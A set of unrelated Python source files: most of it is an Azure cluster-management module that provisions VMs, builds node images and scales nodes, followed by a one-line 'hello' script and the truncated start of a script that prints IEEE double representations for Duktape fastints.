            raise BadRequestError(f"Cluster '{cluster_name}' is exist")
        # Start creating
        try:
            GrassAzureExecutor._create_resource_group(cluster_details=cluster_details)
            GrassAzureExecutor._create_vnet(cluster_details=cluster_details)
            # Simultaneously capture image and init master
            # (node-image build and master provisioning are independent, so
            # they run on two threads and are joined below).
            build_node_image_thread = threading.Thread(
                target=GrassAzureExecutor._build_node_image,
                args=(cluster_details,)
            )
            build_node_image_thread.start()
            create_and_init_master_thread = threading.Thread(
                target=GrassAzureExecutor._create_and_init_master,
                args=(cluster_details,)
            )
            create_and_init_master_thread.start()
            build_node_image_thread.join()
            create_and_init_master_thread.join()
            # local save cluster after initialization
            DetailsWriter.save_cluster_details(cluster_name=cluster_name, cluster_details=cluster_details)
        except Exception as e:
            # If failed, remove details folder, then raise
            shutil.rmtree(path=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}")
            logger.error_red(f"Failed to create cluster '{cluster_name}'")
            raise e
        logger.info_green(f"Cluster '{cluster_name}' is created")
    @staticmethod
    def _standardize_cluster_details(create_deployment: dict) -> dict:
        """Standardize cluster_details from create_deployment.
        We use create_deployment to build cluster_details (they share the same keys structure).
        Args:
            create_deployment (dict): create_deployment of grass/azure. See lib/deployments/internal for reference.
        Returns:
            dict: standardized cluster_details.
        """
        # Random 20-character alphanumeric password for the master's Samba share.
        samba_password = "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(20))
        # Default values filled in for any of these dotted paths missing from
        # the deployment, keyed by DeploymentValidator's path notation.
        optional_key_to_value = {
            "root['master']['redis']": {"port": GlobalParams.DEFAULT_REDIS_PORT},
            "root['master']['redis']['port']": GlobalParams.DEFAULT_REDIS_PORT,
            "root['master']['fluentd']": {"port": GlobalParams.DEFAULT_FLUENTD_PORT},
            "root['master']['fluentd']['port']": GlobalParams.DEFAULT_FLUENTD_PORT,
            "root['master']['samba']": {"password": samba_password},
            "root['master']['samba']['password']": samba_password,
            "root['connection']": {
                "ssh": {"port": GlobalParams.DEFAULT_SSH_PORT},
                "api_server": {"port": GrassParams.DEFAULT_API_SERVER_PORT},
            },
            "root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
            "root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT,
            "root['connection']['api_server']": {"port": GrassParams.DEFAULT_API_SERVER_PORT},
            "root['connection']['api_server']['port']": GrassParams.DEFAULT_API_SERVER_PORT
        }
        # Validate the deployment against the template and fill in defaults in place.
        with open(f"{GrassPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_create.yml") as fr:
            create_deployment_template = yaml.safe_load(fr)
        DeploymentValidator.validate_and_fill_dict(
            template_dict=create_deployment_template,
            actual_dict=create_deployment,
            optional_key_to_value=optional_key_to_value
        )
        # Init runtime fields.
        create_deployment["id"] = NameCreator.create_cluster_id()
        return create_deployment
    @staticmethod
    def _create_resource_group(cluster_details: dict) -> None:
        """Create the resource group if it does not exist.
        Args:
            cluster_details (dict): details of the cluster.
        Returns:
            None.
        """
        # Load params
        subscription = cluster_details["cloud"]["subscription"]
        resource_group = cluster_details["cloud"]["resource_group"]
        # Check if Azure CLI is installed, and print version
        version_details = AzureController.get_version()
        logger.info_green(f"Your Azure CLI version: {version_details['azure-cli']}")
        # Set subscription id
        AzureController.set_subscription(subscription=subscription)
        logger.info_green(f"Set subscription to '{subscription}'")
        # Check and create resource group
        # (an existing group is reused with a warning rather than treated as an error)
        resource_group_details = AzureController.get_resource_group(resource_group=resource_group)
        if resource_group_details:
            logger.warning_yellow(f"Azure resource group '{resource_group}' already exists")
        else:
            AzureController.create_resource_group(
                resource_group=resource_group,
                location=cluster_details["cloud"]["location"]
            )
            logger.info_green(f"Resource group '{resource_group}' is created")
    @staticmethod
    def _create_vnet(cluster_details: dict) -> None:
        """Create vnet for the MARO Cluster.
        Args:
            cluster_details (dict): details of the MARO Cluster.
        Returns:
            None.
        """
        logger.info("Creating vnet")
        # Create ARM parameters and start deployment
        template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_vnet/template.json"
        parameters_file_path = (
            f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}/vnet/arm_create_vnet_parameters.json"
        )
        # ArmTemplateParameterBuilder is defined elsewhere in this module; it
        # writes the ARM parameter JSON to export_path.
        ArmTemplateParameterBuilder.create_vnet(
            cluster_details=cluster_details,
            export_path=parameters_file_path
        )
        AzureController.start_deployment(
            resource_group=cluster_details["cloud"]["resource_group"],
            deployment_name="vnet",
            template_file_path=template_file_path,
            parameters_file_path=parameters_file_path
        )
        logger.info_green("Vnet is created")
@staticmethod
def _build_node_image(cluster_details: dict) -> None:
    """Build Azure Image for MARO Node.

    Creates a temporary VM, initializes the node runtime on it, captures the
    VM as a reusable Azure Image, then deletes the temporary resources.

    The built image will contain required Node runtime environment including GPU support.
    See https://docs.microsoft.com/en-us/azure/virtual-machines/linux/capture-image for reference.

    Args:
        cluster_details (dict): details of the MARO Cluster.

    Returns:
        None.
    """
    logger.info("Building MARO Node image")
    # Build params
    resource_name = "build-node-image"
    image_name = f"{cluster_details['id']}-node-image"
    vm_name = f"{cluster_details['id']}-{resource_name}-vm"
    # Create ARM parameters and start deployment.
    # For simplicity, we use master_node_size as the size of build_node_image_vm here
    template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_build_node_image_vm/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}"
        f"/build_node_image_vm/arm_create_build_node_image_vm_parameters.json"
    )
    ArmTemplateParameterBuilder.create_build_node_image_vm(
        cluster_details=cluster_details,
        node_size=cluster_details["master"]["node_size"],
        export_path=parameters_file_path
    )
    AzureController.start_deployment(
        resource_group=cluster_details["cloud"]["resource_group"],
        deployment_name=resource_name,
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Gracefully wait before querying the freshly-deployed VM's addresses.
    time.sleep(10)
    # Get public ip address
    ip_addresses = AzureController.list_ip_addresses(
        resource_group=cluster_details["cloud"]["resource_group"],
        vm_name=vm_name
    )
    public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
    # Make sure build_node_image_vm is able to connect
    GrassAzureExecutor.retry_connection(
        node_username=cluster_details["cloud"]["default_username"],
        node_hostname=public_ip_address,
        node_ssh_port=cluster_details["connection"]["ssh"]["port"]
    )
    # Run init image script: copy it to the VM, then execute it remotely.
    FileSynchronizer.copy_files_to_node(
        local_path=f"{GrassPaths.MARO_GRASS_LIB}/scripts/build_node_image_vm/init_build_node_image_vm.py",
        remote_dir="~/",
        node_username=cluster_details["cloud"]["default_username"],
        node_hostname=public_ip_address,
        node_ssh_port=cluster_details["connection"]["ssh"]["port"]
    )
    GrassAzureExecutor.remote_init_build_node_image_vm(
        node_username=cluster_details["cloud"]["default_username"],
        node_hostname=public_ip_address,
        node_ssh_port=cluster_details["connection"]["ssh"]["port"]
    )
    # Extract image: the VM must be deallocated and generalized before capture.
    AzureController.deallocate_vm(resource_group=cluster_details["cloud"]["resource_group"], vm_name=vm_name)
    AzureController.generalize_vm(resource_group=cluster_details["cloud"]["resource_group"], vm_name=vm_name)
    AzureController.create_image_from_vm(
        resource_group=cluster_details["cloud"]["resource_group"],
        image_name=image_name,
        vm_name=vm_name
    )
    # Delete the temporary build resources; the captured image remains.
    GrassAzureExecutor._delete_resources(
        resource_group=cluster_details["cloud"]["resource_group"],
        resource_name=resource_name,
        cluster_id=cluster_details["id"]
    )
    logger.info_green("MARO Node Image is built")
@staticmethod
def _create_and_init_master(cluster_details: dict) -> None:
    """Create and init MARO Master.

    Creates the master VM, initializes it, creates the default user, and then
    registers the master and cluster with the master's API server.

    Args:
        cluster_details (dict): details of the MARO Cluster.

    Returns:
        None.
    """
    logger.info("Creating MARO Master")
    # _create_master_vm fills cluster_details["master"] with the VM's
    # addresses/ports, which the API client below depends on.
    GrassAzureExecutor._create_master_vm(cluster_details=cluster_details)
    GrassAzureExecutor._init_master(cluster_details=cluster_details)
    GrassAzureExecutor._create_user(cluster_details=cluster_details)
    # Remote create master, cluster after initialization
    master_api_client = MasterApiClientV1(
        master_hostname=cluster_details["master"]["public_ip_address"],
        master_api_server_port=cluster_details["master"]["api_server"]["port"],
        user_id=cluster_details["user"]["id"],
        master_to_dev_encryption_private_key=cluster_details["user"]["master_to_dev_encryption_private_key"],
        dev_to_master_encryption_public_key=cluster_details["user"]["dev_to_master_encryption_public_key"],
        dev_to_master_signing_private_key=cluster_details["user"]["dev_to_master_signing_private_key"]
    )
    master_api_client.create_master(master_details=cluster_details["master"])
    master_api_client.create_cluster(cluster_details=cluster_details)
    logger.info_green("MARO Master is created")
@staticmethod
def _create_master_vm(cluster_details: dict) -> None:
    """Create MARO Master VM.

    Deploys the master VM via an ARM template and records the resulting
    hostname, username, IP addresses and ports into cluster_details["master"]
    (mutated in place) for later steps.

    Args:
        cluster_details (dict): details of the MARO Cluster.

    Returns:
        None.
    """
    logger.info("Creating Master VM")
    # Build params
    vm_name = f"{cluster_details['id']}-master-vm"
    # Create ARM parameters and start deployment
    template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_master/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}"
        f"/master/arm_create_master_parameters.json"
    )
    ArmTemplateParameterBuilder.create_master(
        cluster_details=cluster_details,
        node_size=cluster_details["master"]["node_size"],
        export_path=parameters_file_path
    )
    AzureController.start_deployment(
        resource_group=cluster_details["cloud"]["resource_group"],
        deployment_name="master",
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Get master IP addresses
    # NOTE(review): the nested shape below matches the az CLI
    # "vm list-ip-addresses" output — confirm against AzureController.
    ip_addresses = AzureController.list_ip_addresses(
        resource_group=cluster_details["cloud"]["resource_group"],
        vm_name=vm_name
    )
    public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
    private_ip_address = ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0]
    # Get other params and fill them to master_details
    hostname = vm_name
    username = cluster_details["cloud"]["default_username"]
    cluster_details["master"]["hostname"] = hostname
    cluster_details["master"]["username"] = username
    cluster_details["master"]["public_ip_address"] = public_ip_address
    cluster_details["master"]["private_ip_address"] = private_ip_address
    cluster_details["master"]["resource_name"] = vm_name
    cluster_details["master"]["ssh"] = {"port": cluster_details["connection"]["ssh"]["port"]}
    cluster_details["master"]["api_server"] = {"port": cluster_details["connection"]["api_server"]["port"]}
    logger.info_green(f"You can login to your master node with: {username}@{public_ip_address}")
    logger.info_green("Master VM is created")
# maro grass delete
def delete(self) -> None:
    """Delete the MARO Cluster and all of its Azure resources.

    Returns:
        None.
    """
    logger.info(f"Deleting cluster '{self.cluster_name}'")
    # Every Azure resource belonging to this cluster carries the cluster id
    # as a name prefix; collect and delete them in one call.
    resources = AzureController.list_resources(resource_group=self.resource_group)
    deletable_ids = [
        resource_info["id"]
        for resource_info in resources
        if resource_info["name"].startswith(self.cluster_id)
    ]
    if deletable_ids:
        AzureController.delete_resources(resource_ids=deletable_ids)
    # Drop the local cluster folder as well.
    shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
    logger.info_green(f"Cluster '{self.cluster_name}' is deleted")
# maro grass node
def scale_node(self, replicas: int, node_size: str):
    """Scale up/down MARO Node using predefined Node Image.

    Args:
        replicas (int): desired number of MARO Node in specific node_size.
        node_size (str): size of the MARO Node VM, see
            https://docs.microsoft.com/en-us/azure/virtual-machines/sizes for reference.

    Returns:
        None.
    """
    nodes_details = self.master_api_client.list_nodes()
    # Tally how many nodes of each size currently exist.
    current_counts = collections.Counter(
        node_details["node_size"] for node_details in nodes_details
    )
    # Validate the requested size against what Azure offers in this location.
    node_size_to_spec = self._get_node_size_to_spec()
    if node_size not in node_size_to_spec:
        raise BadRequestError(f"Invalid node_size '{node_size}'")
    # Create or delete nodes to close the gap between current and desired.
    gap = replicas - current_counts[node_size]
    if gap < 0:
        self._delete_nodes(num=-gap, node_size=node_size)
    elif gap > 0:
        self._create_nodes(num=gap, node_size=node_size)
    else:
        logger.warning_yellow("Replica is match, no create or delete")
def _create_nodes(self, num: int, node_size: str) -> None:
    """Create MARO Nodes in parallel.

    Args:
        num (int): number of MARO Nodes (with specific node_size) to create.
        node_size (str): size of the MARO Node VM.

    Returns:
        None.
    """
    logger.info(f"Scaling up {num}")
    # Fan the creations out across the worker pool.
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(self._create_node, [[node_size] for _ in range(num)])
def _create_node(self, node_size: str) -> None:
    """Create a single MARO Node and join it to the cluster.

    Args:
        node_size (str): size of the MARO Node VM.

    Returns:
        None.
    """
    # Every node gets a freshly generated name that doubles as its id.
    new_node_name = NameCreator.create_node_name()
    logger.info(message=f"Creating node '{new_node_name}'")
    # Provision the VM, then hand its deployment info to the join procedure.
    deployment = self._create_vm(node_name=new_node_name, node_size=node_size)
    self._join_cluster(node_details=deployment["node"])
    logger.info_green(message=f"Node '{new_node_name}' is created")
def _delete_nodes(self, num: int, node_size: str) -> None:
    """Delete MARO Nodes in parallel.

    Args:
        num (int): number of MARO Nodes (with specific node_size) to delete.
        node_size (str): size of the MARO Node VM.

    Returns:
        None.
    """
    nodes_details = self.master_api_client.list_nodes()
    # Only empty nodes of the requested size may be removed. TODO: consider to add -f
    deletable_nodes = [
        node_details["name"]
        for node_details in nodes_details
        if node_details["node_size"] == node_size and not node_details["containers"]
    ]
    if len(deletable_nodes) < num:
        logger.warning_yellow(
            "Unable to scale down.\n"
            f"Only {len(deletable_nodes)} nodes are deletable, but need to delete {num} to meet the replica"
        )
        return
    logger.info(f"Scaling down {num}")
    # Delete the first `num` deletable nodes in parallel.
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(self._delete_node, [[name] for name in deletable_nodes[:num]])
def _create_vm(self, node_name: str, node_size: str) -> dict:
    """Create MARO Node VM.

    Deploys the node VM via an ARM template, then builds (and persists to
    disk) the join_cluster_deployment document describing how the new node
    should attach to the master.

    Args:
        node_name (str): name of the MARO Node. Also the id of the MARO Node.
        node_size (str): size of the MARO Node VM.

    Returns:
        dict: join_cluster_deployment that needed in "join cluster" operation.
            See /lib/scripts/join_cluster.py for reference.
    """
    logger.info(message=f"Creating VM '{node_name}'")
    # Create ARM parameters and start deployment
    os.makedirs(name=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}", exist_ok=True)
    template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_node/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/arm_create_node_parameters.json"
    )
    ArmTemplateParameterBuilder.create_node(
        node_name=node_name,
        cluster_details=self.cluster_details,
        node_size=node_size,
        export_path=parameters_file_path
    )
    AzureController.start_deployment(
        resource_group=self.resource_group,
        deployment_name=node_name,
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Get node IP addresses
    ip_addresses = AzureController.list_ip_addresses(
        resource_group=self.resource_group,
        vm_name=f"{self.cluster_id}-{node_name}-vm"
    )
    logger.info_green(f"VM '{node_name}' is created")
    # Build join_cluster_deployment.
    join_cluster_deployment = {
        "mode": "grass/azure",
        "master": {
            "private_ip_address": self.master_private_ip_address,
            "api_server": {
                "port": self.master_api_server_port
            },
            "redis": {
                "port": self.master_redis_port
            }
        },
        "node": {
            "name": node_name,
            "id": node_name,
            "username": self.default_username,
            "public_ip_address": ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"],
            "private_ip_address": ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0],
            "node_size": node_size,
            "resource_name": f"{self.cluster_id}-{node_name}-vm",
            "hostname": f"{self.cluster_id}-{node_name}-vm",
            # "all" lets the node agent claim every available resource on the VM.
            "resources": {
                "cpu": "all",
                "memory": "all",
                "gpu": "all"
            },
            "api_server": {
                "port": self.api_server_port
            },
            "ssh": {
                "port": self.ssh_port
            }
        },
        "configs": {
            "install_node_runtime": False,
            "install_node_gpu_support": False
        }
    }
    # Persist the deployment doc so _join_cluster can copy it to the node.
    with open(
        file=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/join_cluster_deployment.yml",
        mode="w"
    ) as fw:
        yaml.safe_dump(data=join_cluster_deployment, stream=fw)
    return join_cluster_deployment
def _delete_node(self, node_name: str) -> None:
    """Delete a single MARO Node.

    Args:
        node_name (str): name of the MARO Node.

    Returns:
        None.
    """
    logger.info(f"Deleting node '{node_name}'")
    # Deregister the node from the master first, then tear down the cloud side.
    self.master_api_client.delete_node(node_name=node_name)
    self._delete_resources(
        resource_group=self.resource_group,
        cluster_id=self.cluster_id,
        resource_name=node_name
    )
    AzureController.delete_deployment(
        resource_group=self.resource_group,
        deployment_name=node_name
    )
    # Finally remove the node's local bookkeeping folder.
    shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}")
    logger.info_green(f"Node '{node_name}' is deleted")
def _join_cluster(self, node_details: dict) -> None:
    """Join the cluster using node_details.

    Waits until the node VM is reachable over SSH, copies the
    join_cluster_deployment document onto it, then triggers the remote join
    script.

    Args:
        node_details (dict): details of the MARO Node.

    Returns:
        None.
    """
    node_name = node_details["name"]
    logger.info(f"Node '{node_name}' is joining the cluster '{self.cluster_name}'")
    # Make sure the node is able to connect
    self.retry_connection(
        node_username=node_details["username"],
        node_hostname=node_details["public_ip_address"],
        node_ssh_port=node_details["ssh"]["port"]
    )
    # Copy required files (local path -> remote directory on the node)
    local_path_to_remote_dir = {
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/join_cluster_deployment.yml":
            f"{GlobalPaths.MARO_LOCAL}/clusters/{self.cluster_name}/nodes/{node_name}"
    }
    for local_path, remote_dir in local_path_to_remote_dir.items():
        FileSynchronizer.copy_files_to_node(
            local_path=local_path,
            remote_dir=remote_dir,
            node_username=node_details["username"],
            node_hostname=node_details["public_ip_address"],
            node_ssh_port=node_details["ssh"]["port"]
        )
    # Remote join cluster
    self.remote_join_cluster(
        node_username=node_details["username"],
        node_hostname=node_details["public_ip_address"],
        node_ssh_port=node_details["ssh"]["port"],
        master_private_ip_address=self.master_private_ip_address,
        master_api_server_port=self.master_api_server_port,
        deployment_path=(
            f"{GlobalPaths.MARO_LOCAL}/clusters/{self.cluster_name}/nodes/{node_name}"
            f"/join_cluster_deployment.yml"
        )
    )
    logger.info_green(f"Node '{node_name}' is joined")
def start_node(self, replicas: int, node_size: str):
    """Start MARO Node VMs in parallel.

    Args:
        replicas (int): number of MARO Node in specific node_size to start.
        node_size (str): size of the MARO Node VM, see
            https://docs.microsoft.com/en-us/azure/virtual-machines/sizes for reference.

    Returns:
        None.
    """
    nodes_details = self.master_api_client.list_nodes()
    # A node is startable when it matches the size and is currently stopped.
    startable_nodes = [
        node_details["name"]
        for node_details in nodes_details
        if node_details["node_size"] == node_size
        and node_details["state"]["status"] == NodeStatus.STOPPED
    ]
    if len(startable_nodes) < replicas:
        raise BadRequestError(
            f"No enough '{node_size}' nodes can be started, only {len(startable_nodes)} is able to start"
        )
    # Start the first `replicas` startable nodes in parallel.
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(self._start_node, [[name] for name in startable_nodes[:replicas]])
def _start_node(self, node_name: str):
    """Start a single MARO Node VM.

    Args:
        node_name (str): name of the MARO Node.

    Returns:
        None.
    """
    logger.info(f"Starting node '{node_name}'")
    # Boot the VM first, then mark the node started on the master.
    vm_name = f"{self.cluster_id}-{node_name}-vm"
    AzureController.start_vm(resource_group=self.resource_group, vm_name=vm_name)
    self.master_api_client.start_node(node_name=node_name)
    logger.info_green(f"Node '{node_name}' is started")
def stop_node(self, replicas: int, node_size: str):
    """Stop MARO Node VMs in parallel.

    Args:
        replicas (int): number of MARO Node in specific node_size to stop.
        node_size (str): size of the MARO Node VM, see
            https://docs.microsoft.com/en-us/azure/virtual-machines/sizes for reference.

    Returns:
        None.
    """
    nodes_details = self.master_api_client.list_nodes()
    # A node is stoppable only when it matches the size, is running,
    # and hosts no running containers.
    stoppable_nodes_details = [
        node_details
        for node_details in nodes_details
        if (
            node_details["node_size"] == node_size
            and node_details["state"]["status"] == NodeStatus.RUNNING
            and self._count_running_containers(node_details) == 0
        )
    ]
    if len(stoppable_nodes_details) < replicas:
        raise BadRequestError(
            f"No more '{node_size}' nodes can be stopped, only {len(stoppable_nodes_details)} are stoppable"
        )
    # Stop the first `replicas` stoppable nodes in parallel.
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(self._stop_node, [[node_details] for node_details in stoppable_nodes_details[:replicas]])
def _stop_node(self, node_details: dict):
    """Stop a single MARO Node VM.

    Args:
        node_details (dict): details of the MARO Node.

    Returns:
        None.
    """
    name = node_details["name"]
    logger.info(f"Stopping node '{name}'")
    # Mark the node stopped on the master before powering off its VM.
    self.master_api_client.stop_node(node_name=name)
    AzureController.stop_vm(
        resource_group=self.resource_group,
        vm_name=f"{self.cluster_id}-{name}-vm"
    )
    logger.info_green(f"Node '{name}' is stopped")
def _get_node_size_to_spec(self) -> dict:
    """Get node_size to spec mapping of Azure VM.

    Returns:
        dict: node_size to spec mapping.
    """
    # Each spec dict is keyed by its VM size name (e.g. "Standard_D2s_v3").
    specs = AzureController.list_vm_sizes(location=self.location)
    return {spec["name"]: spec for spec in specs}
@staticmethod
def _count_running_containers(node_details: dict) -> int:
    """Count running containers based on field "Status".

    Args:
        node_details (dict): details of the MARO Node.

    Returns:
        int: num of running containers.
    """
    return sum(
        1
        for container_details in node_details["containers"]
        if container_details["Status"] == ContainerStatus.RUNNING
    )
# maro grass clean
def clean(self) -> None:
    """Delete running jobs, schedule and containers of the MARO Cluster.

    Returns:
        None.
    """
    # The master API server performs the actual cleanup remotely.
    self.master_api_client.clean_jobs()
# Utils
@staticmethod
def _delete_resources(resource_group: str, cluster_id: int, resource_name: str) -> None:
    """Delete resources in the resource group.

    Args:
        resource_group (str): name of the resource group.
        cluster_id (id): id of the MARO Cluster.
        resource_name (str): name of the MARO Resource. e.g. node_name

    Returns:
        None.
    """
    # Resources belonging to this MARO resource share the
    # "<cluster_id>-<resource_name>" name prefix.
    resources = AzureController.list_resources(resource_group=resource_group)
    name_prefix = f"{cluster_id}-{resource_name}"
    deletable_ids = [
        resource_info["id"]
        for resource_info in resources
        if resource_info["name"].startswith(name_prefix)
    ]
    if deletable_ids:
        AzureController.delete_resources(resource_ids=deletable_ids)
class ArmTemplateParameterBuilder:
    """Builder for ARM Template Parameters.

    Each public method loads a base parameters file shipped with the grass
    lib, fills in cluster-specific values, optionally exports the result to
    disk, and returns the parameter dict.

    See https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/ for reference.
    """

    @staticmethod
    def _load_base_parameters(parameters_file_path: str) -> dict:
        """Load a base ARM parameters JSON file from the grass lib."""
        with open(file=parameters_file_path, mode="r") as fr:
            return json.load(fr)

    @staticmethod
    def _export_parameters(base_parameters: dict, export_path: str) -> None:
        """Export parameters as JSON to export_path if the path is set."""
        if export_path:
            os.makedirs(os.path.dirname(export_path), exist_ok=True)
            with open(export_path, "w") as fw:
                json.dump(base_parameters, fw, indent=4)

    @staticmethod
    def create_vnet(cluster_details: dict, export_path: str) -> dict:
        """Create parameters file for vnet.

        Args:
            cluster_details (dict): details of the MARO Cluster.
            export_path (str): location to export the parameter file.

        Returns:
            dict: parameter dict, should be exported to json.
        """
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters(
            f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_vnet/parameters.json"
        )
        parameters = base_parameters["parameters"]
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_master(cluster_details: dict, node_size: str, export_path: str) -> dict:
        """Create parameters file for MARO Master VM.

        Args:
            cluster_details (dict): details of the MARO Cluster.
            node_size (str): node_size of the MARO Master VM.
            export_path (str): path to export the parameter file.

        Returns:
            dict: parameter dict, should be exported to json.
        """
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters(
            f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_master/parameters.json"
        )
        parameters = base_parameters["parameters"]
        parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
        parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
        parameters["apiServerDestinationPorts"]["value"] = [cluster_details["connection"]["api_server"]["port"]]
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-master-nic"
        parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-master-nsg"
        parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-master-pip"
        parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
        parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-master-vm"
        parameters["virtualMachineSize"]["value"] = node_size
        parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_build_node_image_vm(cluster_details: dict, node_size: str, export_path: str) -> dict:
        """Create parameters file for Build Image Node VM.

        Args:
            cluster_details (dict): details of the MARO Cluster.
            node_size (str): node_size of the Build Image Node VM.
            export_path (str): path to export the parameter file.

        Returns:
            dict: parameter dict, should be exported to json.
        """
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters(
            f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_build_node_image_vm/parameters.json"
        )
        parameters = base_parameters["parameters"]
        parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
        parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-build-node-image-nic"
        parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-build-node-image-nsg"
        parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-build-node-image-pip"
        parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
        parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-build-node-image-vm"
        parameters["virtualMachineSize"]["value"] = node_size
        parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters

    @staticmethod
    def create_node(node_name: str, cluster_details: dict, node_size: str, export_path: str) -> dict:
        """Create parameters file for MARO Node VM.

        Args:
            node_name (str): name of the MARO Node.
            cluster_details (dict): details of the MARO Cluster.
            node_size (str): node_size of the MARO Node VM.
            export_path (str): path to export the parameter file.

        Returns:
            dict: parameter dict, should be exported to json.
        """
        base_parameters = ArmTemplateParameterBuilder._load_base_parameters(
            f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_node/parameters.json"
        )
        parameters = base_parameters["parameters"]
        parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
        parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
        # Node VMs boot from the image captured by _build_node_image.
        parameters["imageResourceId"]["value"] = AzureController.get_image_resource_id(
            resource_group=cluster_details["cloud"]["resource_group"],
            image_name=f"{cluster_details['id']}-node-image"
        )
        parameters["location"]["value"] = cluster_details["cloud"]["location"]
        parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-{node_name}-nic"
        parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-{node_name}-nsg"
        parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-{node_name}-pip"
        parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
        parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-{node_name}-vm"
        parameters["virtualMachineSize"]["value"] = node_size
        parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
        ArmTemplateParameterBuilder._export_parameters(base_parameters, export_path)
        return base_parameters
|
#!/usr/bin/env python
# Trivial smoke-test script: print a greeting.
print('hello')
|
#!/usr/bin/env python2
#
# Print out a few IEEE double representations related to the Duktape fastint
# number model.
#
# NOTE: signed zero does not work correctly here.
#
import struct
import math
def isFastint(x):
    # A fastint is an integer-valued IEEE double in [-2^47, 2^47), excluding
    # negative zero (which needs a full IEEE double representation).
    # The negative-zero rejection resolves the original FIXME / the header
    # note "signed zero does not work correctly here".
    if math.floor(x) != x:
        return False
    if not (-(2 ** 47) <= x < 2 ** 47):
        return False
    if x == 0 and math.copysign(1.0, x) < 0:
        # Negative zero: equal to 0 but with the sign bit set.
        return False
    return True
def stringRep(x):
    # Pack x as a big-endian IEEE double and break out its fields.
    # The original used str.encode('hex') and ord(tmp[i]), which only work on
    # Python 2; this version produces identical output on Python 2 and 3.
    tmp = struct.pack('>d', x)
    # Portable hex dump: bytearray yields ints on both Python 2 and 3.
    tmphex = ''.join('%02x' % byte for byte in bytearray(tmp))
    # Top 16 bits: 1 sign bit, 11 exponent bits, 4 high mantissa bits.
    sgnexp = struct.unpack('>H', tmp[:2])[0]
    sgn = (sgnexp) >> 15
    exp = (sgnexp & 0x7ff0) >> 4
